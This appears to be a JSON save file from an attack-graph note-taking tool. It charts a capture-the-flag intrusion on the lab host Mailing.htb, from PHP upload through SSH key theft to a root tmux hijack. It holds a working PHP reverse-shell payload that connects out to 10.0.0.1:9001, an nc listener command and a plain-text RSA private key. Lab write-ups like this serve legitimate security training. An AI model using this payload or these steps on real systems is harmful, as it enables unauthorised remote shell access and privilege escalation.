{
  "ContextName": "Root",
  "Nodes": [],
  "Paths": [],
  "ChildrenContexts": [
    {
      "ContextName": "Mailing.htb",
      "Nodes": [
        {
          "Id": "3c711755-7a97-4e7d-bb7b-b29ba5635f06",
          "NodeType": "ServiceNodeViewModel",
          "NodeName": "Apache Tomcat",
          "X": 7050.624969591143,
          "Y": 7498.412119889295,
          "Properties": [
            {
              "PropertyName": "Location",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "/var/www",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Simple apache website",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            },
            {
              "PropertyName": "File Upload Bypass",
              "IsVisableOnGraphNode": false,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": null,
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "aim",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffb613d0",
          "ThemeColor2": "#ff6524f3"
        },
        {
          "Id": "ead3bcaf-e619-408a-94b5-37a2f914cf77",
          "NodeType": "AttackNodeViewModel",
          "NodeName": "PHP File Upload",
          "X": 7051.0375760221405,
          "Y": 6955.687271933577,
          "Properties": [
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Upload the malicious php file and load the file through the web server. Used an nc listener to catch the shell.",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            },
            {
              "PropertyName": "Payload",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "<?php\r\n$sock=fsockopen(\"10.0.0.1\",9001);exec(\"/bin/sh -i <&3 >&3 2>&3\");\r\n?>",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "command",
              "IconColorString": null
            },
            {
              "PropertyName": "Listener",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "nc -lvnp 9001",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "command",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffff3333",
          "ThemeColor2": "#ffdd2222"
        },
        {
          "Id": "90c6c9af-0454-4b7d-a828-70df2c2b037d",
          "NodeType": "UserNodeViewModel",
          "NodeName": "www-data",
          "X": 7095.40650119733,
          "Y": 6674.649081868712,
          "Properties": [
            {
              "PropertyName": "Groups",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "www-data",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Default apache user for running the web server. It has very limited permissions.",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffef3f79",
          "ThemeColor2": "#ffd511d5"
        },
        {
          "Id": "ed862c55-b2dc-4a78-93c0-986ec7eed2f9",
          "NodeType": "AssetNodeViewModel",
          "NodeName": "id_rsa",
          "X": 7112.862803980476,
          "Y": 6409.942282880766,
          "Properties": [
            {
              "PropertyName": "Location",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "/home/jeff/.ssh/id_rsa",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "SSH private key stored in jeffs user directory",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            },
            {
              "PropertyName": "Jeff id_rsa",
              "IsVisableOnGraphNode": false,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "-----BEGIN RSA PRIVATE KEY-----\r\nMIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu\r\nKUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm\r\no3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k\r\nTQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7\r\n9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy\r\nv/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs\r\n/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00\r\n-----END RSA PRIVATE KEY-----",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffeab900",
          "ThemeColor2": "#fffa8700"
        },
        {
          "Id": "84519c6c-4b60-4b04-8730-511bc1ac0919",
          "NodeType": "AttackNodeViewModel",
          "NodeName": "SSH to Jeff",
          "X": 7089.402160644531,
          "Y": 6107.532440185547,
          "Properties": [
            {
              "PropertyName": "Command",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "ssh -i id_rsa jeff@10.10.14.56",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "command",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Use jeffs private key to connect via ssh",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffff3333",
          "ThemeColor2": "#ffdd2222"
        },
        {
          "Id": "5d407ed8-24fc-4c55-b6a3-be57fefd62ff",
          "NodeType": "ReconNodeViewModel",
          "NodeName": "LinPEAS",
          "X": 7104.000061035156,
          "Y": 5747.7728271484375,
          "Properties": [
            {
              "PropertyName": "Command",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "./linpeas.sh",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "command",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Found left over tmux session as root in /tmp that jeff has write permission to.",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ff55dd55",
          "ThemeColor2": "#ff22aa22"
        },
        {
          "Id": "d8b8d584-29e1-4f36-9f48-57670c0743c2",
          "NodeType": "AssetNodeViewModel",
          "NodeName": "user.txt",
          "X": 7464.7545166015625,
          "Y": 5842.037933349609,
          "Properties": [
            {
              "PropertyName": "Location",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "/home/jeff/user.txt",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffeab900",
          "ThemeColor2": "#fffa8700"
        },
        {
          "Id": "609225ca-4d97-4454-9528-e3ff55da2856",
          "NodeType": "AttackNodeViewModel",
          "NodeName": "Root TMUX Session Restore",
          "X": 7111.628173828125,
          "Y": 5469.753173828125,
          "Properties": [
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "Attach to the root tmux session using jeff's write access",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffff3333",
          "ThemeColor2": "#ffdd2222"
        },
        {
          "Id": "519beb35-5657-4f5e-9260-bb25e4798d3d",
          "NodeType": "UserNodeViewModel",
          "NodeName": "root",
          "X": 7136.649353027344,
          "Y": 5287.185302734375,
          "Properties": [
            {
              "PropertyName": "Groups",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "root",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            },
            {
              "PropertyName": "Description",
              "IsVisableOnGraphNode": false,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": null,
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "text",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffef3f79",
          "ThemeColor2": "#ffd511d5"
        },
        {
          "Id": "e9fa8b02-e5dd-40a7-bde7-a96e0f522f69",
          "NodeType": "AssetNodeViewModel",
          "NodeName": "root.txt",
          "X": 7134.76220703125,
          "Y": 5059.669097900391,
          "Properties": [
            {
              "PropertyName": "Location",
              "IsVisableOnGraphNode": true,
              "IsSecret": false,
              "IsDeletable": false,
              "PropertyType": 0,
              "Value": "/root/root.txt",
              "ListContent": null,
              "TextContent": null,
              "ExecutableCommand": null,
              "ExecutableType": 0,
              "Command": null,
              "Description": null,
              "Url": null,
              "DisplayText": null,
              "Code": null,
              "IconName": "file-richtext-fill",
              "IconColorString": null
            }
          ],
          "ThemeColor1": "#ffeab900",
          "ThemeColor2": "#fffa8700"
        }
      ],
      "Paths": [
        {
          "StartNodeId": "3c711755-7a97-4e7d-bb7b-b29ba5635f06",
          "EndNodeId": "ead3bcaf-e619-408a-94b5-37a2f914cf77"
        },
        {
          "StartNodeId": "ead3bcaf-e619-408a-94b5-37a2f914cf77",
          "EndNodeId": "90c6c9af-0454-4b7d-a828-70df2c2b037d"
        },
        {
          "StartNodeId": "90c6c9af-0454-4b7d-a828-70df2c2b037d",
          "EndNodeId": "ed862c55-b2dc-4a78-93c0-986ec7eed2f9"
        },
        {
          "StartNodeId": "ed862c55-b2dc-4a78-93c0-986ec7eed2f9",
          "EndNodeId": "84519c6c-4b60-4b04-8730-511bc1ac0919"
        },
        {
          "StartNodeId": "84519c6c-4b60-4b04-8730-511bc1ac0919",
          "EndNodeId": "5d407ed8-24fc-4c55-b6a3-be57fefd62ff"
        },
        {
          "StartNodeId": "84519c6c-4b60-4b04-8730-511bc1ac0919",
          "EndNodeId": "d8b8d584-29e1-4f36-9f48-57670c0743c2"
        },
        {
          "StartNodeId": "5d407ed8-24fc-4c55-b6a3-be57fefd62ff",
          "EndNodeId": "609225ca-4d97-4454-9528-e3ff55da2856"
        },
        {
          "StartNodeId": "609225ca-4d97-4454-9528-e3ff55da2856",
          "EndNodeId": "519beb35-5657-4f5e-9260-bb25e4798d3d"
        },
        {
          "StartNodeId": "519beb35-5657-4f5e-9260-bb25e4798d3d",
          "EndNodeId": "e9fa8b02-e5dd-40a7-bde7-a96e0f522f69"
        }
      ],
      "ChildrenContexts": [],
      "Id": "6e2caca6-21ef-4399-a41b-d85996f615c8",
      "NodeType": "HostNodeViewModel",
      "NodeName": "Mailing.htb",
      "X": 7160.8,
      "Y": 7345.599999999999,
      "Properties": [
        {
          "PropertyName": "Interfaces",
          "IsVisableOnGraphNode": true,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": null,
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "sitemap-icon",
          "IconColorString": null
        },
        {
          "PropertyName": "Os",
          "IsVisableOnGraphNode": true,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": "Ubuntu 20.04",
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "start-cog",
          "IconColorString": null
        },
        {
          "PropertyName": "User Count",
          "IsVisableOnGraphNode": true,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": "1",
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "file-richtext-fill",
          "IconColorString": null
        },
        {
          "PropertyName": "Service Count",
          "IsVisableOnGraphNode": false,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": "1",
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "file-richtext-fill",
          "IconColorString": null
        },
        {
          "PropertyName": "Description",
          "IsVisableOnGraphNode": true,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": "Webserver hosting a simple apache based website",
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "text",
          "IconColorString": null
        },
        {
          "PropertyName": "eth0",
          "IsVisableOnGraphNode": true,
          "IsSecret": false,
          "IsDeletable": false,
          "PropertyType": 0,
          "Value": null,
          "ListContent": null,
          "TextContent": null,
          "ExecutableCommand": null,
          "ExecutableType": 0,
          "Command": null,
          "Description": null,
          "Url": null,
          "DisplayText": null,
          "Code": null,
          "IconName": "sitemap-icon",
          "IconColorString": null
        }
      ],
      "ThemeColor1": "#ff19c8f3",
      "ThemeColor2": "#ff6551e5"
    }
  ],
  "Id": "8b8d2e7b-0437-49e6-8e27-0f60ac0a7fb3",
  "NodeType": "ContextBase",
  "NodeName": null,
  "X": 0.0,
  "Y": 0.0,
  "Properties": [],
  "ThemeColor1": null,
  "ThemeColor2": null
}